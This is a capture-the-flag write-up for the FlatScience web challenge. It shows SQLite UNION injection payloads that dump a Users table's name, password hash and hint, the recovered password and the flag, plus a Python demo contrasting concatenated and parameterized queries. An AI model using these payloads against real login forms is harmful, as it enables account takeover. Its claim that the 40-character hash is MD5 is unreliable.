[Attack and Defense World Web] Four-star difficulty, 12 point advanced question: FlatScience
2022-07-23 21:01:00 【Black zone (rise)】
2. FlatScience
How to solve the problem:
1. Understand the source code, database injection, encryption
The process:
I prefer to look at the robots.txt file first
/admin.php page
/login.php page
Press Ctrl+U to open the page source
Found ?debug
Found new source code
Start the code audit
The database turns out to be SQLite3 (it differs from MySQL: the relevant information is stored in the sqlite_master table).
Its type/name/tbl_name/rootpage/sql columns record the information from when the user created the table
The comment marker is --
The usr input is also found to be injectable
There is no filtering, so it is spliced into the SQL statement and executed by the database
Intercept the request with bp (Burp Suite) and inject
(the injection is done in bp)
Determine the number of fields
1' order by 3 --
(returns an error)
1' order by 2 --
(normal response)
So the number of fields is 2
Determine which field is echoed
1' union select 1,2 --
The echoed position is the second field
Check the fields in the table from the returned sql
CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29
After URL-decoding
CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))
The fields are: id, name, password, hint
Construct a query for name
payload:
1' union select id, name from Users--
admin
Construct a query for password
payload:
1' union select id, password from Users--
3fab54a50e770d830c0416df817567662a9dc85c
Construct a query for hint
payload:
1' union select id, hint from Users--
my+fav+word+in+my+fav+paper%3F%21
After URL-decoding
my+fav+word+in+my+fav+paper?!
We get the first row of the table
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c (MD5 is message-digest encryption, so it may not be possible to crack it)
hint=my+fav+word+in+my+fav+paper?! (it's in his paper)
Decrypted, it is
ThinJerboaSalz!
That word is Salz
ThinJerboaSalz! minus Salz
So the password is ThinJerboa
Log in on the /admin.php page
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
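Every step above depends on the usr value being spliced into the SQL text without filtering. As an added example (not the challenge's own code; the shape of the login query and the function names are assumptions), this runs the write-up's password payload against a concatenated query and a parameterized one, on an in-memory SQLite table built from the schema shown above:

```python
import sqlite3

# Schema and row values are the ones shown in this write-up, loaded as a constructed sample.
SCHEMA = ("CREATE TABLE Users(id int primary key, name varchar(255), "
          "password varchar(255), hint varchar(255))")
ROW = (1, "admin", "3fab54a50e770d830c0416df817567662a9dc85c",
       "my+fav+word+in+my+fav+paper?!")
# usr value the write-up uses to read the password column.
PAYLOAD = "1' union select id, password from Users--"


def make_db():
    """Build an in-memory SQLite database holding the single sample row."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO Users VALUES (?, ?, ?, ?)", ROW)
    return db


def login_concat(db, usr, pw):
    """Assumed vulnerable shape: input is spliced into the SQL text."""
    sql = f"SELECT id, name FROM Users WHERE name='{usr}' AND password='{pw}'"
    return db.execute(sql).fetchall()


def login_bound(db, usr, pw):
    """Hardened form: placeholders keep input as data, never as SQL."""
    sql = "SELECT id, name FROM Users WHERE name=? AND password=?"
    return db.execute(sql, (usr, pw)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Concatenated: the quote closes the string, UNION adds a row, -- drops the rest.
    print("concat:", login_concat(db, PAYLOAD, "x"))
    # Bound: the whole payload is compared to name as one literal string.
    print("bound: ", login_bound(db, PAYLOAD, "x"))
    # A legitimate name containing a quote breaks the concatenated query too.
    try:
        login_concat(db, "o'brien", "x")
    except sqlite3.OperationalError as exc:
        print("concat with o'brien:", exc)
    print("bound with o'brien:", login_bound(db, "o'brien", "x"))
```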